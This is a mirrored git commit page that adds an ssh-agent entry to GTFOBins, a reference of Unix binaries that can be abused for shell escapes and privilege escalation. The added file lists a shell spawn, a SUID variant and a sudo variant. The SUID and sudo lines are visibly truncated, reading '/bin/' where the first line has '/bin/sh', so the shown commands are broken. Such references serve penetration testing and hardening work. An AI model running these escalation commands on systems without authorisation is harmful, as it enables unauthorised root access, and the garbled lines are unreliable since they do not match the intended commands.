1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Add ssh-agent

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Emanuel Duss 2023-03-20 17:46:13 +01:00 committed by GitHub
parent 1121363e20
commit 15f69868f6
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

9
_gtfobins/ssh-agent.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: ssh-agent /bin/sh
suid:
- code: ./ssh-agent /bin/ -p
sudo:
- code: sudo ssh-agent /bin/
---